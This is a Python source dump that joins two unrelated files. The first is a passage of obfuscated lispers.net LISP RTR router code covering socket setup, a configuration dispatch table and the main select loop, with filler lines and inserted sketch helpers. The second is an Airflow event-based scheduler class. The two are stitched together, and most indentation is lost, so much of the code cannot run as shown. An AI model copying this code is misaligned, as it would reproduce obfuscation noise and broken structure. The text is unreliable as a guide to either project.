if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
o0OO00oo0O ( )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
IiIIiii1I ( lisp_raw_socket )
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
oOOoo00O0O = threading . Timer ( 60 , ii1I ,
[ lisp_raw_socket ] )
oOOoo00O0O . start ( )
return
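#
# Hedged sketch of the re-arming pattern used above: a periodic job built by
# scheduling a fresh threading.Timer at the end of every run (names are
# illustrative only).
#
def _example_periodic(interval_secs, job, args):
    import threading
    def _run():
        job(*args)
        threading.Timer(interval_secs, _run).start()   # re-arm for next run
    threading.Timer(interval_secs, _run).start()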
#
# RTR process startup: determine the local RLOCs (including the AWS case),
# open the control, IPC, raw, and trace sockets, start the pcap and worker
# threads, load the map-cache checkpoint, and start the periodic timer.
#
def i111I11I ( ) :
global Ii1iI , Oo0o , I1Ii11I1Ii1i
global o0oOoO00o , i1 , O0ooo00OOo00
global Oo , OOO0o0o
global iIiiI1
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
if 41 - 41: IiII
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
if 10 - 10: II111iiii . O0
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
O0oooOoO = lisp . bold ( "AWS RTR" , False )
Oo0OoO00oOO0o = None
for oo0 in [ "eth0" , "ens5" ] :
Oo0OoO00oOO0o = lisp . lisp_get_interface_address ( oo0 )
if ( Oo0OoO00oOO0o != None ) : break
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if ( Oo0OoO00oOO0o != None ) :
iIiiI1 = Oo0OoO00oOO0o
iI1Iii = Oo0OoO00oOO0o . print_address_no_iid ( )
lisp . lprint ( "{} using RLOC {} on {}" . format ( O0oooOoO , iI1Iii , oo0 ) )
else :
iI1Iii = iIiiI1 . print_address_no_iid ( )
lisp . lprint ( "{} cannot obtain RLOC, using {}" . format ( O0oooOoO , iI1Iii ) )
I1i1II1 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( I1i1II1 ,
str ( Ooo ) )
Ii1iI = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
Oo = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 89 - 89: OoO0O00 / OoO0O00
Oo0o [ 0 ] = I1Ii11I1Ii1i
if 1 - 1: I1ii11iIi11i . i11iIiiIii
Oo0o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o [ 2 ] = Ii1iI
o0oOoO00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
o0oOoO00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o . append ( o0oOoO00o )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
OOO0o0o = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if 12 - 12: I1ii11iIi11i / Ii1I
if ( lisp . lisp_is_raspbian ( ) == False ) :
i1 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
Ii1I1 = os . getenv ( "LISP_PCAP_THREADS" )
Ii1I1 = 1 if ( Ii1I1 == None ) else int ( Ii1I1 )
O0oo00oOOO0o = os . getenv ( "LISP_WORKER_THREADS" )
O0oo00oOOO0o = 0 if ( O0oo00oOOO0o == None ) else int ( O0oo00oOOO0o )
if 5 - 5: o0oOOo0O0Ooo / I1IiiI % Ii1I . IiII
if 86 - 86: i1IIi * OoOoOO00 . O0 - Ii1I - o0oOOo0O0Ooo - OoOoOO00
if 47 - 47: OOooOOo + I11i
if 50 - 50: I1Ii111 + I1ii11iIi11i
for i1Ii in range ( Ii1I1 ) :
OOOooOOOOOOOO = lisp . lisp_thread ( "pcap-{}" . format ( i1Ii ) )
OOOooOOOOOOOO . thread_number = i1Ii
OOOooOOOOOOOO . number_of_pcap_threads = Ii1I1
OOOooOOOOOOOO . number_of_worker_threads = O0oo00oOOO0o
O0ooo00OOo00 . append ( OOOooOOOOOOOO )
threading . Thread ( target = ii , args = [ OOOooOOOOOOOO ] ) . start ( )
for i1Ii in range ( O0oo00oOOO0o ) :
OOOooOOOOOOOO = lisp . lisp_thread ( "worker-{}" . format ( i1Ii ) )
O0ooo00OOo00 . append ( OOOooOOOOOOOO )
threading . Thread ( target = I1III111i , args = [ OOOooOOOOOOOO ] ) . start ( )
if 23 - 23: o0oOOo0O0Ooo + Ii1I % OoOoOO00 % I1IiiI % OoooooooOO
if 78 - 78: OoO0O00 / Oo0Ooo - iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
if 93 - 93: ooOoO0o
lisp . lisp_load_checkpoint ( )
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
oOOoo00O0O = threading . Timer ( 60 , ii1I ,
[ o0oOoO00o ] )
oOOoo00O0O . start ( )
return ( True )
#
# RTR shutdown: close all control, IPC, trace, and raw sockets.
#
def I11 ( ) :
if 18 - 18: iIii1I11I1II1
if 30 - 30: O0 + OOooOOo % Oo0Ooo . i1IIi
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
lisp . lisp_close_socket ( Oo0o [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o [ 1 ] , "" )
lisp . lisp_close_socket ( Ii1iI , "lisp-rtr" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
lisp . lisp_close_socket ( OOO0o0o , "" )
lisp . lisp_close_socket ( Oo , "lispers.net-itr" )
o0oOoO00o . close ( )
return
#
# Process a "lisp map-resolver" command clause and schedule a test of the
# configured Map-Resolvers.
#
def o0oO0o00O ( kv_pair ) :
global Oo0o
global Ooo
if 6 - 6: OoooooooOO / i11iIiiIii / I1Ii111
lispconfig . lisp_map_resolver_command ( kv_pair )
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ Oo0o , Ooo ] )
lisp . lisp_test_mr_timer . start ( )
if 34 - 34: I1Ii111 - OOooOOo
return
#
# Process a "lisp xtr-parameters" command clause: apply the settings, start
# the RLOC-probe timer if probing was just enabled, and push the updated
# parameters to the external data-plane.
#
def iiI1 ( kv_pair ) :
global I1Ii11I1Ii1i , o0oOoO00o , Ooo
if 50 - 50: ooOoO0o * OoOoOO00 + I1ii11iIi11i - i11iIiiIii + Oo0Ooo * I1ii11iIi11i
i11II = lisp . lisp_rloc_probing
if 69 - 69: I1Ii111 - i1IIi % iII111i . OOooOOo - OOooOOo
if 65 - 65: OOooOOo + II111iiii
if 61 - 61: i11iIiiIii * oO0o % Oo0Ooo * I1Ii111 - OoooooooOO - OoO0O00
if 83 - 83: ooOoO0o / OOooOOo
lispconfig . lisp_xtr_command ( kv_pair )
if 39 - 39: IiII + I11i
if 9 - 9: I1IiiI % I11i . Oo0Ooo * I1IiiI
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
if 20 - 20: OoOoOO00 * iII111i
if 19 - 19: OoooooooOO
if ( i11II == False and lisp . lisp_rloc_probing ) :
o00O0OoO = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
None , o0oOoO00o ]
lisp . lisp_start_rloc_probe_timer ( 1 , o00O0OoO )
oO0Oo = { "type" : "itr-crypto-port" , "port" : Ooo }
lisp . lisp_write_to_dp_socket ( oO0Oo )
if 76 - 76: OoO0O00 * oO0o
if 63 - 63: II111iiii . II111iiii + I1ii11iIi11i + OOooOOo + O0 . Ii1I
if 1 - 1: O0 * i11iIiiIii - ooOoO0o - Ii1I
if 94 - 94: OoO0O00 + IiII + ooOoO0o
if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
if 99 - 99: I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - iIii1I11I1II1 - Ii1I
if 31 - 31: IiII - OoO0O00 / OOooOOo . i1IIi / Ii1I
#
# Command-clause dispatch table: maps each configuration clause name to its
# handler and the keywords (with allowed value ranges) that the lispconfig
# parser accepts for that clause.
#
o0o000o = {
"lisp xtr-parameters" : [ iiI1 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ o0oO0o00O , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiii , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
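
# --- Illustrative sketch (not part of lispers.net) ---------------------------
# The table above maps each CLI clause (e.g. "lisp map-cache") to a handler
# function plus a schema of permitted keywords.  A minimal dispatcher over a
# table shaped like that could look as follows; the function name and error
# handling here are hypothetical, added only to show the pattern.
def _dispatch_clause_example(table, clause, kv_pair):
    if clause not in table: return None
    handler, schema = table[clause]
    unknown = [keyword for keyword in kv_pair if keyword not in schema]
    if unknown:
        raise ValueError("unknown keywords for '{}': {}".format(clause, unknown))
    return handler(kv_pair)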
def iiI11Ii1i(lisp_socket):
    O00Ooo0ooo0, oOO0OooOo, i1I, O0O0oOOo0O = lisp.lisp_receive(lisp_socket, False)
    oO00o0O00o = lisp.lisp_trace()
    if (oO00o0O00o.decode(O0O0oOOo0O) == False): return

    oO00o0O00o.rtr_cache_nat_trace(oOO0OooOo, i1I)

if (i111I11I() == False):
    lisp.lprint("lisp_rtr_startup() failed")
    lisp.lisp_print_banner("RTR abnormal exit")
    exit(1)
i1IiiI = [I1Ii11I1Ii1i, Ii1iI, Oo, OOO0o0o]
O0OOO0 = [I1Ii11I1Ii1i] * 3

while (True):
    try: iIi, oo0ooO, oO00oo0o00o0o = select.select(i1IiiI, [], [])
    except: break

    if (lisp.lisp_ipc_data_plane and Oo in iIi):
        lisp.lisp_process_punt(Oo, Oo0o, Ooo)

    if (OOO0o0o in iIi):
        iiI11Ii1i(OOO0o0o)

    if (I1Ii11I1Ii1i in iIi):
        O00Ooo0ooo0, oOO0OooOo, i1I, O0O0oOOo0O = lisp.lisp_receive(O0OOO0[0],
            False)
        if (oOO0OooOo == ""): break
        if (lisp.lisp_is_rloc_probe_request(O0O0oOOo0O[0])):
            lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
            continue
        if (lisp.lisp_is_rloc_probe_reply(O0O0oOOo0O[0])):
            lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
            continue
        lisp.lisp_parse_packet(O0OOO0, O0O0oOOo0O, oOO0OooOo, i1I)

    if (Ii1iI in iIi):
        O00Ooo0ooo0, oOO0OooOo, i1I, O0O0oOOo0O = lisp.lisp_receive(Ii1iI, True)
        if (oOO0OooOo == ""): break

        if (O00Ooo0ooo0 == "command"):
            if (O0O0oOOo0O == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            if (O0O0oOOo0O.find("clear%") != -1):
                lispconfig.lisp_clear_decap_stats(O0O0oOOo0O)
                continue
            lispconfig.lisp_process_command(Ii1iI, O00Ooo0ooo0,
                O0O0oOOo0O, "lisp-rtr", [o0o000o])
        elif (O00Ooo0ooo0 == "api"):
            lisp.lisp_process_api("lisp-rtr", Ii1iI, O0O0oOOo0O)
        elif (O00Ooo0ooo0 == "data-packet"):
            Ii1ii111i1(O0O0oOOo0O, "")
        else:
            if (lisp.lisp_is_rloc_probe_request(O0O0oOOo0O[0])):
                lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
                continue
            if (lisp.lisp_is_rloc_probe_reply(O0O0oOOo0O[0])):
                lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
                continue
            lisp.lisp_parse_packet(Oo0o, O0O0oOOo0O, oOO0OooOo, i1I)

I11()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
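
# --- Illustrative sketch (not part of lispers.net) ---------------------------
# The main loop above multiplexes several sockets with select() and hands each
# readable socket to the matching handler.  A self-contained version of that
# pattern, with hypothetical handler wiring:
def _select_dispatch_example(handlers):
    """handlers: dict mapping a selectable socket to a callable(socket)."""
    import select
    sockets = list(handlers.keys())
    while True:
        try:
            readable, _, _ = select.select(sockets, [], [])
        except (OSError, KeyboardInterrupt):
            break
        for sock in readable:
            handlers[sock](sock)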
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._remove_periodic_events(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _remove_periodic_events(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun)\
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
